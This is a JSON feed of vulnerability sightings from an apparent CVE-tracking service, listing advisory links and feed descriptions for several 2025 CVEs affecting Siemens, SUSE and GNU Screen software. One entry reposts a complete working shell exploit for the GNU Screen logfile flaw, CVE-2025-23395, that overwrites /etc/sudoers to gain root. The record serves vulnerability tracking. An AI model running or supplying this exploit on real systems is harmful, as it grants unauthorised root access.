{"vulnerability": "cve-2025-2339", "sightings": [{"uuid": "6d489e1e-7940-4fee-a203-01bf7feef090", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-2339", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lkj65nfyyx2m", "content": "", "creation_timestamp": "2025-03-16T17:30:32.234604Z"}, {"uuid": "f19a7e92-514c-4a6f-9ead-3f28c04002c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23396", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-072-01", "content": "", "creation_timestamp": "2025-03-13T11:00:00.000000Z"}, {"uuid": "cb7a2d21-4e3f-4fa6-950f-e7c712b612e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23397", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-072-01", "content": "", "creation_timestamp": "2025-03-13T11:00:00.000000Z"}, {"uuid": "45f348ad-3fc1-49c0-91a8-d0ea83104d2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23398", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-072-01", "content": "", "creation_timestamp": "2025-03-13T11:00:00.000000Z"}, {"uuid": "fbeccf79-b663-467a-a1a2-ad06b43c18ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23399", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-072-01", "content": "", "creation_timestamp": "2025-03-13T11:00:00.000000Z"}, {"uuid": "b3d12f39-4f0f-4cae-9bcd-55338b446d77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23394", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lq3q67r4d422", "content": "", "creation_timestamp": "2025-05-26T17:46:51.411531Z"}, {"uuid": "d59d64e4-a7a8-4971-a60a-7a1bd0bd8240", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23392", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lq3raroovb2k", "content": "", "creation_timestamp": "2025-05-26T18:06:10.803098Z"}, {"uuid": "233348ce-56ff-425d-a5ae-695ec275b27e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23391", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3llva3f5gb62r", "content": "", "creation_timestamp": "2025-04-03T06:02:11.506060Z"}, {"uuid": "55030ded-95af-4ab1-ba59-ac3dbd2225bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23391", "type": "seen", "source": "https://bsky.app/profile/andranglin.bsky.social/post/3llvh7l6j2c2s", "content": "", "creation_timestamp": "2025-04-03T08:09:50.207929Z"}, {"uuid": "87545184-019c-4ec4-ba0f-f0e6724e7732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23394", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/114575463039495814", "content": "", "creation_timestamp": "2025-05-26T18:07:02.714675Z"}, {"uuid": "437fd513-efb3-4e38-883e-230059d39c3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23395", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lq3rsoryp32s", "content": "", "creation_timestamp": "2025-05-26T18:16:11.716225Z"}, {"uuid": "d4a2ab2b-e866-409b-a9fd-26c2ebaedde3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23391", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3llwphjov7c2o", "content": "", "creation_timestamp": "2025-04-03T20:10:05.436163Z"}, {"uuid": "db16d327-d3d0-4102-bd92-0e93b2a3388f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23391", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lmjwksxzzs2f", "content": "", "creation_timestamp": "2025-04-11T11:37:52.741390Z"}, {"uuid": "d5b2f48a-2c61-48ee-bdb0-17f46a23764b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23391", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114319534961696220", "content": "", "creation_timestamp": "2025-04-11T13:21:10.709912Z"}, {"uuid": "117b47d7-ee46-48fc-a56b-042353bce0d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23391", "type": "seen", "source": "https://mastodon.social/users/CyberSignaler/statuses/114319644596450744", "content": "", "creation_timestamp": "2025-04-11T13:49:03.383389Z"}, {"uuid": "8652e30d-3a13-47da-b727-da0eaa21a18c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23393", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lq57xkimdv62", "content": "", "creation_timestamp": "2025-05-27T08:02:31.549274Z"}, {"uuid": "13b974b5-3350-4027-aa29-3cef531e27aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23393", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lq5gsnxvtg27", "content": "", "creation_timestamp": "2025-05-27T10:04:39.369930Z"}, {"uuid": "2741dba9-02c1-43c2-b428-897f3c922ac3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23394", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114579994495150014", "content": "", "creation_timestamp": "2025-05-27T13:19:27.574374Z"}, {"uuid": "a31f9db0-8200-477e-a4ac-3072f52979f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23394", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lql5u7kfs22x", "content": "", "creation_timestamp": "2025-06-01T21:01:44.584694Z"}, {"uuid": "c68277f2-0dea-40af-b031-4b2550bd64b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23395", "type": "seen", "source": "https://bsky.app/profile/hacker-news-jp.bsky.social/post/3lp3anlggyb2d", "content": "", "creation_timestamp": "2025-05-13T19:43:55.212296Z"}, {"uuid": "04c392b2-5ec9-4eb3-977c-f1ffae2d2c55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2025-23395", "type": "seen", "source": "https://www.openwall.com/lists/oss-security/2025/05/12/1", "content": "", "creation_timestamp": "2025-05-12T17:24:36.000000Z"}, {"uuid": "1cc23ad5-3620-4edb-9901-7e90d3ce473c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2025-23395", "type": "seen", "source": "https://security.opensuse.org/2025/05/12/screen-security-issues.html#3b-tty-hijacking-while-attaching-to-a-multi-user-session-cve-2025-46802", "content": "", "creation_timestamp": "2025-05-12T17:00:00.000000Z"}, {"uuid": "b7efcd44-a50c-4966-bf12-0424981054ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23392", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lq3oue47oow2", "content": "", "creation_timestamp": "2025-05-26T17:23:30.581905Z"}, {"uuid": "7e973fb8-75b5-47f4-9a53-e13f7b5b1ba2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23394", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lq3ougjbbhm2", "content": "", "creation_timestamp": "2025-05-26T17:23:31.189122Z"}, {"uuid": "43c808a8-4d59-4531-a090-06062edd077a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23395", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lq3ougkkssm2", "content": "", "creation_timestamp": "2025-05-26T17:23:42.157180Z"}, {"uuid": "1f3d6102-2ba7-4490-89b7-b9863744c66f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23399", "type": "seen", "source": "MISP/682bdba3-46b7-4a8f-b7be-c6bf4b4f9868", "content": "", "creation_timestamp": "2025-08-13T13:26:35.000000Z"}, {"uuid": "1132a6e4-a49b-4de4-9573-6e5785fbfd3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23398", "type": "seen", "source": "MISP/682bdba3-46b7-4a8f-b7be-c6bf4b4f9868", "content": "", "creation_timestamp": "2025-08-13T13:26:35.000000Z"}, {"uuid": "10fab46c-429f-498c-9843-87c9c93918b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23397", "type": "seen", "source": "MISP/682bdba3-46b7-4a8f-b7be-c6bf4b4f9868", "content": "", "creation_timestamp": "2025-08-13T13:26:35.000000Z"}, {"uuid": "e36cf08f-0eeb-4fdd-a8c5-ebfbd2a3f8da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2025-23395", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/c74ad4e9-43df-4294-a337-22d34debbe64", "content": "", "creation_timestamp": "2025-05-14T13:48:57.849042Z"}, {"uuid": "334c6bdf-a32b-42be-b9a1-62a54ef1f481", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23396", "type": "seen", "source": "https://t.me/cvedetector/20081", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-23396 - Siemens Teamcenter Visualization Plant Simulation Out-of-Bounds Write Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-23396 \nPublished : March 11, 2025, 10:15 a.m. | 1\u00a0hour, 55\u00a0minutes ago \nDescription : A vulnerability has been identified in Teamcenter Visualization V14.3 (All versions < V14.3.0.13), Teamcenter Visualization V2312 (All versions < V2312.0009), Teamcenter Visualization V2406 (All versions < V2406.0007), Teamcenter Visualization V2412 (All versions < V2412.0002), Tecnomatix Plant Simulation V2302 (All versions < V2302.0021), Tecnomatix Plant Simulation V2404 (All versions < V2404.0010). The affected applications contain an out of bounds write vulnerability when parsing a specially crafted WRL file.  \nThis could allow an attacker to execute code in the context of the current process. \nSeverity: 7.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"11 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-11T13:26:59.000000Z"}, {"uuid": "5720cb6b-cf01-4894-8499-d0ba9ea3d6ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23398", "type": "seen", "source": "https://t.me/cvedetector/20077", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-23398 - Siemens Teamcenter Visualization and Tecnomatix Plant Simulation WRL File Memory Corruption Remote Code Execution Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-23398 \nPublished : March 11, 2025, 10:15 a.m. | 1\u00a0hour, 55\u00a0minutes ago \nDescription : A vulnerability has been identified in Teamcenter Visualization V14.3 (All versions < V14.3.0.13), Teamcenter Visualization V2312 (All versions < V2312.0009), Teamcenter Visualization V2406 (All versions < V2406.0007), Teamcenter Visualization V2412 (All versions < V2412.0002), Tecnomatix Plant Simulation V2302 (All versions < V2302.0021), Tecnomatix Plant Simulation V2404 (All versions < V2404.0010). The affected application is vulnerable to memory corruption while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process. \nSeverity: 7.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"11 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-11T13:26:56.000000Z"}, {"uuid": "5deae792-7e1a-4a69-bcac-626fa3abeb19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23399", "type": "seen", "source": "https://t.me/cvedetector/20073", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-23399 - \"Siemens Teamcenter Visualization and Tecnomatix Plant Simulation Out-of-Bounds Read Vulnerability\"\", \n  \"Content\": \"CVE ID : CVE-2025-23399 \nPublished : March 11, 2025, 10:15 a.m. | 1\u00a0hour, 55\u00a0minutes ago \nDescription : A vulnerability has been identified in Teamcenter Visualization V14.3 (All versions < V14.3.0.13), Teamcenter Visualization V2312 (All versions < V2312.0009), Teamcenter Visualization V2406 (All versions < V2406.0007), Teamcenter Visualization V2412 (All versions < V2412.0002), Tecnomatix Plant Simulation V2302 (All versions < V2302.0021), Tecnomatix Plant Simulation V2404 (All versions < V2404.0010). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted WRL files.  \nThis could allow an attacker to execute code in the context of the current process. \nSeverity: 7.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"11 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-11T13:26:50.000000Z"}, {"uuid": "3e99c053-aa7e-424d-bc07-28f0c16824d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-2339", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7711", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2339\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: A vulnerability was found in otale Tale Blog 2.0.5. It has been classified as problematic. This affects an unknown part of the file /%61dmin/api/logs. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer.\n\ud83d\udccf Published: 2025-03-16T13:00:07.828Z\n\ud83d\udccf Modified: 2025-03-16T13:00:07.828Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.299805\n2. https://vuldb.com/?ctiid.299805\n3. https://vuldb.com/?submit.511578\n4. https://github.com/qkdjksfkeg/cve_article/blob/main/Tale/Unauthorized.md", "creation_timestamp": "2025-03-16T13:49:26.000000Z"}, {"uuid": "96c98db8-22bc-4dee-aca0-7619e35ca971", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23391", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11412", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23391\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A Incorrect Privilege Assignment vulnerability in SUSE rancher allows a Restricted Administrator to change the password of Administrators and take over their accounts.\nThis issue affects rancher: from 2.8.0 before 2.8.14, from 2.9.0 before 2.9.8, from 2.10.0 before 2.10.4.\n\ud83d\udccf Published: 2025-04-11T10:38:43.642Z\n\ud83d\udccf Modified: 2025-04-11T10:38:43.642Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-23391\n2. https://github.com/rancher/rancher/security/advisories/GHSA-8p83-cpfg-fj3g", "creation_timestamp": "2025-04-11T10:50:12.000000Z"}, {"uuid": "dbcab201-29a8-4785-b49c-4736f7d8ade5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23395", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17568", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23395\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Screen 5.0.0 when it runs with setuid-root privileges does not drop privileges while operating on a user supplied path. This allows unprivileged users to create files in arbitrary locations with `root` ownership, the invoking user's (real) group ownership and file mode 0644. All data written to the Screen PTY will be logged into this file, allowing to escalate to root privileges\n\ud83d\udccf Published: 2025-05-26T15:18:46.694Z\n\ud83d\udccf Modified: 2025-05-26T15:18:46.694Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-23395\n2. https://www.openwall.com/lists/oss-security/2025/05/12/1", "creation_timestamp": "2025-05-26T15:47:06.000000Z"}, {"uuid": "ffe18752-4285-4ff9-93e0-ae0da28beaa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23394", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17567", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23394\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: A UNIX Symbolic Link (Symlink) Following vulnerability in openSUSE Tumbleweed cyrus-imapd allows escalation from cyrus to root.This issue affects openSUSE Tumbleweed  cyrus-imapd before 3.8.4-2.1.\n\ud83d\udccf Published: 2025-05-26T15:34:32.562Z\n\ud83d\udccf Modified: 2025-05-26T15:34:32.562Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-23394", "creation_timestamp": "2025-05-26T15:47:05.000000Z"}, {"uuid": "b540a28f-9a17-468e-9328-bd01157d9fa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23392", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17572", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23392\n\ud83d\udd25 CVSS Score: 5.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in spacewalk-java allows execution of arbitrary Javascript code on target systems.This issue affects Container suse/manager/5.0/x86_64/server:5.0.4.7.19.1: from ? before 5.0.24-150600.3.25.1; Container suse/manager/5.0/x86_64/server:5.0.4.7.19.1: from ? before 5.0.24-150600.3.25.1; Container suse/manager/5.0/x86_64/server:5.0.4.7.19.1: from ? before 5.0.24-150600.3.25.1; Container suse/manager/5.0/x86_64/server:5.0.4.7.19.1: from ? before 5.0.24-150600.3.25.1; SUSE Manager Server Module 4.3: from ? before 4.3.85-150400.3.105.3; SUSE Manager Server Module 4.3: from ? before 4.3.85-150400.3.105.3; SUSE Manager Server Module 4.3: from ? before 4.3.85-150400.3.105.3; SUSE Manager Server Module 4.3: from ? before 4.3.85-150400.3.105.3.\n\ud83d\udccf Published: 2025-05-26T16:06:25.847Z\n\ud83d\udccf Modified: 2025-05-26T16:06:48.636Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-23392", "creation_timestamp": "2025-05-26T16:51:29.000000Z"}, {"uuid": "7b0d2970-24db-4a1f-9c3f-5300e030b772", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23393", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17610", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23393\n\ud83d\udd25 CVSS Score: 5.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in\u00a0 spacewalk-java allows execution of arbitrary Javascript code on users machines.This issue affects Container suse/manager/5.0/x86_64/server:5.0.4.7.19.1: from ? before 5.0.24-150600.3.25.1; SUSE Manager Server Module 4.3: from ? before 4.3.85-150400.3.105.3.\n\ud83d\udccf Published: 2025-05-27T07:23:39.008Z\n\ud83d\udccf Modified: 2025-05-27T07:23:39.008Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-23393", "creation_timestamp": "2025-05-27T07:48:14.000000Z"}, {"uuid": "64303a94-7552-4529-be61-4df4a07cd30b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23395", "type": "published-proof-of-concept", "source": "https://t.me/P0x3k_1N73LL1G3NC3/87", "content": "CVE-2025-23395 Screen LPE exploit\n\n#!/bin/sh\n\nF=$(mktemp)\nL=${HOME}/screen.log\nT=/etc/sudoers\nrm -rf $F $L\nmkfifo $F\nO=$(stat --printf=\"%s\" $T)\necho \"[+] spawning GNU screen\"\nscreen -L -Logfile $L -dmS hax sh -c \"cat $F\"\nwhile [ ! -f $L ]; do sleep 0.1; done\necho \"[+] logfile appeared, doing hax\"\nrm $L\nln -s $T $L\nP=\"${USER} ALL=(ALL) NOPASSWD:ALL\"\n(echo $P; for i in `seq 8192`; do echo; done) > $F\nif [ $(stat --printf=\"%s\" $T) -gt $O ] ; then\n        echo \"[+] bl1ng bl1ng, we got it\"\n        sudo sh\nelse\n        echo \"[-] exploit failed :(\"\nfi\nrm -rf $F $L\n\nBlog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395", "creation_timestamp": "2025-05-15T09:24:26.000000Z"}, {"uuid": "1e4013b5-c1f3-4d8a-b405-d386ec3274f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23391", "type": "seen", "source": "https://t.me/cvedetector/22728", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-23391 - SUSE Rancher Privilege Escalation Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-23391 \nPublished : April 11, 2025, 11:15 a.m. | 18\u00a0minutes ago \nDescription : A Incorrect Privilege Assignment vulnerability in SUSE rancher allows a Restricted Administrator to change the password of Administrators and take over their accounts.  \nThis issue affects rancher: from 2.8.0 before 2.8.14, from 2.9.0 before 2.9.8, from 2.10.0 before 2.10.4. \nSeverity: 9.1 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"11 Apr 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-04-11T13:56:34.000000Z"}, {"uuid": "2af1a899-18e8-4e8f-83af-0df47267ef0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-2339", "type": "seen", "source": "https://t.me/cvedetector/20410", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-2339 - \"otale Tale Blog Remote Authentication Bypass\"\", \n  \"Content\": \"CVE ID : CVE-2025-2339 \nPublished : March 16, 2025, 1:15 p.m. | 1\u00a0hour, 48\u00a0minutes ago \nDescription : A vulnerability was found in otale Tale Blog 2.0.5. It has been classified as problematic. This affects an unknown part of the file /%61dmin/api/logs. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer. \nSeverity: 5.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"16 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-16T16:22:35.000000Z"}, {"uuid": "74eb564d-0388-4e02-96c9-e1b9702ad321", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23398", "type": "seen", "source": "Telegram/vEDVNGCPAWGffCLhscI9wuBjXzU-UJ-Kd2wneJcY77eho_c", "content": "", "creation_timestamp": "2025-03-11T11:35:13.000000Z"}, {"uuid": "e5c61477-e0cf-4276-b420-dcdc0a0e2216", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23397", "type": "seen", "source": "Telegram/vEDVNGCPAWGffCLhscI9wuBjXzU-UJ-Kd2wneJcY77eho_c", "content": "", "creation_timestamp": "2025-03-11T11:35:13.000000Z"}, {"uuid": "075a5d68-286a-4b3e-b265-9f258bdd4f0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23396", "type": "seen", "source": "Telegram/euipiHO9WYwKjoIWc4_KVD8IVMVysdONt8NOtM0tUvNLxBg", "content": "", "creation_timestamp": "2025-03-11T11:35:14.000000Z"}, {"uuid": "f3e4dc4b-a9d1-420c-86ee-1d194fb8744a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-23399", "type": "seen", "source": "Telegram/vEDVNGCPAWGffCLhscI9wuBjXzU-UJ-Kd2wneJcY77eho_c", "content": "", "creation_timestamp": "2025-03-11T11:35:13.000000Z"}]}